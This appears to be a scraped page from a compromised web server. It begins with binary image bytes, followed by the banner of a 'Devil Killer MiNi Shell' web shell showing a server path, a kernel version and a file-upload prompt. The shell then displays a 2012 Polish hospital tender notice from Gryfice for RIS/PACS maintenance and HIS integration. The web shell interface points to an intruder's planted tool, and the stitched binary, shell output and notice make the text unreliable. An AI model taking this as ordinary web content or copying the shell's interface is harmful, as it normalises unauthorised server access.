JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/474086-N-2012.html

<p class="kh_header"><b>Gryfice: Świadczenie usług serwisowych wraz z nadzorem autorskim umożliwiających bieżącą eksploatację systemów RIS/PACS Alteris z dostawą dodatkowych licencji oraz aktualizacją oprogramowania i integracją z systemem HIS Eskulap</b><br>
<b>Numer ogłoszenia: 474086 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Niechorska 27, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842127, faks 091 3842127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.medicam.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług serwisowych wraz z nadzorem autorskim umożliwiających bieżącą eksploatację systemów RIS/PACS Alteris z dostawą dodatkowych licencji oraz aktualizacją oprogramowania i integracją z systemem HIS Eskulap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1 
3.1.	Przedmiot Zamówienia w zakresie świadczenia usług serwisowych 
a.	Przedmiotem zamówienia jest świadczenie usług serwisowych wraz z nadzorem autorskim umożliwiających bieżącą eksploatację systemów RIS i PACS produkcji Alteris Sp. z o.o. wraz z ich rozbudową, z możliwością wymiany na równoważny.
b.	Przedmiotem zamówienia jest Świadczenie usług serwisowych wraz z nadzorem autorskim integracji z systemem informatycznym  HIS Eskulap
c.	Zakres ilościowy oprogramowania stanowiący przedmiot usług serwisowych został szczegółowo określony we wzorze umowy - Załącznik nr 1A.
d.	Szczegółowe wymagania techniczne i procedury realizacji usług są określone w załączniku 1B do SIWZ.

3.2.	Przedmiot zamówienia w zakresie rozbudowy systemu RIS o nową funkcjonalność MEDEOS
W ramach przedmiotu umowy Wykonawca będzie zobligowany do zwiększenia zakresu funkcjonalności systemu RIS o nową, umożliwiającą komunikację między podmiotami biorącymi udział w programie /Telemedycyna w Euroregionie Pomerania
System MEDEOS, bo o nim mowa, to system opracowany przez  /Akademickie Centrum Informatyki Zachodniopomorskiego Uniwersytetu Technologicznego w Szczecinie/ oraz /Fundacja IT/
3.3.	Przedmiot zamówienia w zakresie rozbudowy systemu PACS Alteris.
W ramach przedmiotu umowy Wykonawca dostarczy licencje oraz wykona wszelkie niezbędne prace wdrożeniowe mające na celu wpięcie do sytemu PACS następujących aparatów stanowiących obecnie przedmiot odrębnego postępowania:
- Aparat do śródoperacyjnego badania MRI
- Aparat RTG do zdjęć cyfrowy (ZDO)
- Mammograf cyfrowy (ZDO)
 -Mammograf cyfrowy (Kołobrzeg)
- Skaner x4 (Goleniów, Szczecin, Stargard, Łobez)
- Rezonans Magnetyczny stacjonarny (ZDO)
- USG ogólno-diagnostyczne x 2 (ZDO, Szczecin)
- Aparat RTG, przejezdny z ramieniem C, cyfrowy (SOR)
- Aparat RTG do zdjęć, przejezdny, cyfrowy (SOR)
- USG przejezdny, cyfrowy x 2 (SOR, OIT)
- UKG (Pracowni Kardiologicznej)
- USG (Oddziału Ginekologicznego)
- USG / UKG (Resko)
- 8 dodatkowych licencji.   

Wszystkie urządzenia posiadają możliwość współpracy z systemami PACS z wykorzystaniem protokołu DICOM3. Wykonawca obejmie dostarczone oprogramowanie gwarancją trwającą od daty zakończenia instalacji i konfiguracji oprogramowania do zakończenia umowy. Gwarancja będzie obejmowała usługi serwisowe i nadzór autorski tożsame z określonymi w punkcie 3.1 przedmiotu zamówienia.

3.4.	Przedmiotem umowy jest migracja Systemu RIS/PACS do serwera wirtualnego (VmWare 5.0) wraz z migracją badań (obrazów) ze starej macierzy na nową macierz zamawiającego.

3.5.	Przedmiot zamówienia w zakresie podłączenia Systemu RIS/PACS, HIS do Centralnego Systemu archiwizacji danych SPZZOZ w Gryficach

Pakiet nr 2 
3.6.	Przedmiot zamówienia w zakresie integracji z systemem Eskulap
W ramach przedmiotu umowy Wykonawca będzie zobligowany do wykonania integracji systemu RIS/PACS Alteris z systemem klasy HIS produkcji Politechniki Poznańskiej eksploatowanym                         w Szpitalu, z udzieleniem 12 miesięcznej gwarancji działania tej integracji, który został wdrożony                  i jest obecnie serwisowany przez firmę Systemy Informatyczne ALMA Sp. z o.o. z siedzibą                             w Poznaniu. Specyfikację techniczna oraz zakres integracji muszą spełniać następujące minimalne wymagania:
3.6.1.	Specyfikacja techniczna: 
- Wymiana danych musi się odbywać w czasie rzeczywistym. 
- Zamawiający dopuszcza każdy z wariantów wymiany danych tj. bezpośrednio na bazie danych, przy wykorzystaniu standardu HL-7 lub przy wykorzystaniu standardu DICOM.
- Opierając się na informacjach pozyskanych od producentów RIS -Alteris i HIS -Eskulap wymogiem dla standardu HL7 jest wersja 2.3 lub 2.5 natomiast dla standardu DICOM wersja 3.0. 
- Zgodnie posiadanymi informacjami w celu realizacji integracji system Eskulap jest w stanie przekazać (np. komunikatem HL7 lub w lisice roboczej) do każdego zlecenia unikalne ID badania z wykorzystaniem, którego możliwa będzie dalej identyfikacja tego badania                      w obydwu systemach.
3.6.2.	Zakres wymiany danych pomiędzy systemami Eskulap i Alteris:
- Zamawiający wymaga, żeby dane osobowe pacjenta, zgodnie z obowiązującą zasadą jednokrotnego wprowadzania pacjenta, mogły być wprowadzane w jednym z systemów RIS lub HIS  i po wprowadzeniu tych danych, dostępne zarówno jednym jak i drugim systemie. Nie dopuszcza się konieczności ich ponownego wprowadzania  w żadnym z w/w systemów. Dane wprowadzone z poziomu RIS zostają umieszczone w bazie danych systemu HIS. 
- Każde skierowanie (zlecenie na badanie) dotyczące pacjentów przebywających na oddziale lub w poradni wysłane z modułu Dokumentacja Medyczna systemu Eskulap trafi na worklistę do danego aparatu. Analogicznie w odniesieniu do pacjentów przyjmowanych na badania komercyjne lub refundowane przez NFZ, którzy rejestrowani są bezpośrednio w systemie RIS. Dane pacjentów rejestrowanych w systemie RIS zostają pobierane z bazy danych systemu HIS. Obowiązuje zasada jednokrotnego wprowadzania danych.
- Po wykonaniu badania przez urządzenie jego opis następuje na stacji diagnostycznej (opisowa) z dostępem do systemu RIS. Minimalnym zakres wymiany musi przewidywać funkcję, realizacja której powoduje, że wywołanie pola opisowego danego badania w tym systemie implikuje pokazanie na drugim monitorze właściwych obiektów graficznych (zdjęcie, film) stanowiących przedmiot opisu w przeglądarce znajdującej się na stacji diagnostycznej (np. Efilm).
- Uruchomienie odpowiedniej funkcji (przyciśnięcie przycisku /Zdjęcia/) z poziomu HIS Dokumentacji med. pacjenta na oddziale bądź w poradni skutkuje zaprezentowaniem                       w przeglądarce danych obrazowych znajdującej się na danej stacji roboczej (np. k-pacs), skorelowanych z danym opisem badania.
Serwisowany system RIS/PACS będzie systemem podrzędnym w stosunku do systemu HIS. System HIS będzie systemem nadrzędnym, w którym zawszę będzie się rozpoczynała rejestracja pacjenta niezależnie od miejsca rejestracji.
Zamawiający zastrzega, że we wszystkich kwestiach spornych mogących wyniknąć w pomiędzy Wykonawcą a dostawcą HIS obowiązek dokonania niezbędnych zmian w oprogramowaniu umożliwiających poprawną integrację będzie spoczywał na Wykonawcy. Jeżeli Wykonawca                          z przyczyn technicznych lub innych nie będzie w stanie zaimplementować w oferowanym przez siebie oprogramowaniu niezbędnych zmian, zostanie zobligowany do pokrycia kosztów wykonania niezbędnych modyfikacji przez dostawcę systemu HIS w ramach przedmiotu zamówienia.
Wykonawca dostarczy zamawiającemu instrumenty umożliwiające zamawiającemu autoryzację                  do bazy danych systemu RIS i PACS w zakresie umożliwiającym sprawowanie przez zamawiającego nadzoru nad danymi osobowymi oraz wykonywanie uprawnień właścicielskich                     w stosunku do zgromadzonych danych, w tym migracje danych.


W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do podłączenia Systemów                   RIS / PACS, HIS do centralnego systemu archiwizacji danych SPZZOZ w Gryficach, i przetestowaniu                          w porozumieniu z Sekcją IT SPZZOZ w Gryficach, poprawności działania - przesyłania archiwizowanych danych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.26.70.00-4, 72.25.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie: Pakiet nr 1 - 2.000 zł ( słownie: dwa tysiące złotych).
Pakiet nr 2 - 1.000 zł ( słownie: jeden tysiąc złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca jest zobowiązany wykazać. Ocena spełnienia tego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy, stanowiącego załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla pakietu nr 1 na potwierdzenie warunku Zamawiający wymaga, wykazu wykonanych,                                     a w przypadku świadczeń okresowych lub ciągłych również wykonywanych minimum jednego zadania o zbliżonym charakterze i wartości odpowiadającej oferowanemu przedmiotowi zamówienia: czyli świadczenie usług serwisowych wraz z nadzorem autorskim oprogramowania w zakres którego wchodziły systemy klasy RIS lub PACS oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie.
Dla pakietu nr 2 na potwierdzenie warunku Zamawiający wymaga, wykazu wykonanych,                                     a w przypadku świadczeń okresowych lub ciągłych również wykonywanych minimum jednego zadania o zbliżonym charakterze i wartości odpowiadającej oferowanemu przedmiotowi zamówienia: integracja systemów za pomocą protokołu HL7 oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca    jest zobowiązany wykazać. Ocena spełnienia tego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy, stanowiącego załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca    jest zobowiązany wykazać. Ocena spełnienia tego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy, stanowiącego załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca    jest zobowiązany wykazać. Ocena spełnienia tego warunku zostanie dokonana na podstawie Oświadczenia Wykonawcy, stanowiącego załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla pakietu nr 2 oświadczenie autora systemu klasy HIS produkcji Politechniki Poznańskiej lub firmy obecnie serwisującej SI ALMA Sp. z o.o., że zakres integracji z pkt. 3.6 zostanie zrealizowany w całości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza możliwość zmian istotnych postanowień umowy w porównaniu do treści oferty, na podstawie której dokonano wyboru Wykonawcy, przy zaistnieniu następujących okoliczności:
a.	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia - w takim przypadku umowa będzie mogła zostać dostosowana do zaistniałych okoliczności;
b.	jeśli nastąpi zmiana przepisów dot. podatku VAT lub innych przepisów powszechnie obowiązujących, które będą miały wpływ na realizację umowy - w takim przypadku umowa będzie mogła być dostosowana do tych przepisów.
c.	jeżeli wystąpią okoliczności niezależne od Wykonawcy, uniemożliwiające wykonanie zamówienia w terminach określonych w umowie - wówczas zmiana umowy może dotyczyć przedłużenia terminu wykonania poszczególnych elementów przedmiotu zamówienia                       i dostosowania do wydłużonego terminu innych postanowień umowy.
d.	jeżeli nastąpi konieczność modyfikacji jej poszczególnych zapisów w celu zachowania spójności z treścią materiałów przedłożonych przez Wykonawców w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.medicam.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów
Opieki Zdrowotnej w Gryficach
ul. Niechorska 27
72-300 Gryfice
Dział zamówień publicznych - pok. 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów
Opieki Zdrowotnej w Gryficach
ul. Niechorska 27
72-300 Gryfice
Sekretariat - pok. 51.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1 
3.1.	Przedmiot Zamówienia w zakresie świadczenia usług serwisowych 
a.	Przedmiotem zamówienia jest świadczenie usług serwisowych wraz z nadzorem autorskim umożliwiających bieżącą eksploatację systemów RIS i PACS produkcji Alteris Sp. z o.o. wraz z ich rozbudową, z możliwością wymiany na równoważny.
b.	Przedmiotem zamówienia jest Świadczenie usług serwisowych wraz z nadzorem autorskim integracji z systemem informatycznym  HIS Eskulap
c.	Zakres ilościowy oprogramowania stanowiący przedmiot usług serwisowych został szczegółowo określony we wzorze umowy - Załącznik nr 1A.
d.	Szczegółowe wymagania techniczne i procedury realizacji usług są określone w załączniku 1B do SIWZ.

3.2.	Przedmiot zamówienia w zakresie rozbudowy systemu RIS o nową funkcjonalność MEDEOS
W ramach przedmiotu umowy Wykonawca będzie zobligowany do zwiększenia zakresu funkcjonalności systemu RIS o nową, umożliwiającą komunikację między podmiotami biorącymi udział w programie /Telemedycyna w Euroregionie Pomerania
System MEDEOS, bo o nim mowa, to system opracowany przez  /Akademickie Centrum Informatyki Zachodniopomorskiego Uniwersytetu Technologicznego w Szczecinie/ oraz /Fundacja IT/
3.3.	Przedmiot zamówienia w zakresie rozbudowy systemu PACS Alteris.
W ramach przedmiotu umowy Wykonawca dostarczy licencje oraz wykona wszelkie niezbędne prace wdrożeniowe mające na celu wpięcie do sytemu PACS następujących aparatów stanowiących obecnie przedmiot odrębnego postępowania:
- Aparat do śródoperacyjnego badania MRI
- Aparat RTG do zdjęć cyfrowy (ZDO)
- Mammograf cyfrowy (ZDO)
 -Mammograf cyfrowy (Kołobrzeg)
- Skaner x4 (Goleniów, Szczecin, Stargard, Łobez)
- Rezonans Magnetyczny stacjonarny (ZDO)
- USG ogólno-diagnostyczne x 2 (ZDO, Szczecin)
- Aparat RTG, przejezdny z ramieniem C, cyfrowy (SOR)
- Aparat RTG do zdjęć, przejezdny, cyfrowy (SOR)
- USG przejezdny, cyfrowy x 2 (SOR, OIT)
- UKG (Pracowni Kardiologicznej)
- USG (Oddziału Ginekologicznego)
- USG / UKG (Resko)
- 8 dodatkowych licencji.   

Wszystkie urządzenia posiadają możliwość współpracy z systemami PACS z wykorzystaniem protokołu DICOM3. Wykonawca obejmie dostarczone oprogramowanie gwarancją trwającą od daty zakończenia instalacji i konfiguracji oprogramowania do zakończenia umowy. Gwarancja będzie obejmowała usługi serwisowe i nadzór autorski tożsame z określonymi w punkcie 3.1 przedmiotu zamówienia.

3.4.	Przedmiotem umowy jest migracja Systemu RIS/PACS do serwera wirtualnego (VmWare 5.0) wraz z migracją badań (obrazów) ze starej macierzy na nową macierz zamawiającego.

3.5.	Przedmiot zamówienia w zakresie podłączenia Systemu RIS/PACS, HIS do Centralnego Systemu archiwizacji danych SPZZOZ w Gryficach


Termin wykonania przedmiotu zamówienia określonego w punkcie 3.1. specyfikacji istotnych warunków zamówienia  tj. usługi: [SA] -Serwis Aplikacji, [NA] -Nadzór Autorski, Konsultacje [KA], -  12 miesięcy od daty zawarcia umowy.
Termin wykonania przedmiotu zamówienia określonego w punkcie 3.2 tj. w zakresie rozbudowy systemu RIS o nową funkcjonalność MEDEOS - 180 dni od daty zawarcia umowy.
Termin wykonania przedmiotu zamówienia określonego w punkcie 3.3  specyfikacji istotnych warunków zamówienia tj. dostarczenie licencji oprogramowania PACS Alteris                         w zakresie uprawniającym do eksploatacji nowych aparatów wraz z wykonaniem niezbędnych usług wdrożeniowych - 60 dni od daty zawarcia umowy.
Termin wykonania przedmiotu zamówienia określonego w punkcie 3.4 tj. Migracja Systemu RIS/PACS do serwera wirtualnego (VmWare 5.0) wraz z badaniami (obrazami) ze starej macierzy na nową - 60 dni od daty zawarcia umowy.
Termin wykonania przedmiotu zamówienia określonego w punkcie 3.5 tj. podłączenie Systemu RIS/PACS, HIS do Centralnego Systemu archiwizacji danych SPZZOZ w Gryficach -  30 dni od daty zakończenia realizacji pkt 3.4. umowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.26.70.00-4, 72.25.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.6.	Przedmiot zamówienia w zakresie integracji z systemem Eskulap
W ramach przedmiotu umowy Wykonawca będzie zobligowany do wykonania integracji systemu RIS/PACS Alteris z systemem klasy HIS produkcji Politechniki Poznańskiej eksploatowanym                         w Szpitalu, z udzieleniem 12 miesięcznej gwarancji działania tej integracji, który został wdrożony                  i jest obecnie serwisowany przez firmę Systemy Informatyczne ALMA Sp. z o.o. z siedzibą                             w Poznaniu. Specyfikację techniczna oraz zakres integracji muszą spełniać następujące minimalne wymagania:
3.6.1.	Specyfikacja techniczna: 
- Wymiana danych musi się odbywać w czasie rzeczywistym. 
